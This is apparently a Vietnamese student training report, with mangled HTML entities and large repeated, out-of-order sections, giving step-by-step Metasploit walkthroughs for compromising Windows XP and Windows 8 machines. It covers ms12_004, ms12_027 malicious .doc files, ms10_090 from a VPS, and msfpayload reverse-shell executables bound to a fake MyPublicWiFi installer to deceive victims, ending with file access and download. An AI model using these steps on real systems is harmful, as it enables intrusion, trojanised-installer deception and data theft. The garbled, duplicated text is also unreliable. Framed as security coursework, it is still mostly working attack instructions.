những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
